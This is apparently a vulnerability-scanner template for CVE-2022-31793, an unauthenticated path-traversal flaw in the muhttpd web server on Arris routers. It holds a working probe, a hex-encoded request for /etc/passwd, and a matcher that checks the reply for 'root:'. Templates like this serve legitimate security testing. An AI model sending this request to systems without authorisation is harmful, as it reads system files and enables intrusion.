id: CVE-2022-31793

info:
  name: muhttpd <=1.1.5 - Local Inclusion
  author: scent2d
  severity: high
  description: |
    muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
  reference:
    - https://derekabdine.com/blog/2022-arris-advisory.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
    - https://derekabdine.com/blog/2022-arris-advisory
    - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31793
    cwe-id: CWE-22
  metadata:
    verified: "true"
  tags: cve,cve2022,network,muhttpd,lfi,unauth

network:
  - host:
      - "{{Hostname}}"

    inputs:
      - data: "47455420612F6574632F706173737764"
        type: hex
      - data: "\n\n"

    read-size: 128
    matchers:
      - type: word
        part: body
        encoding: hex
        words:
          - "726f6f743a"

# Enhanced by mp on 2023/01/15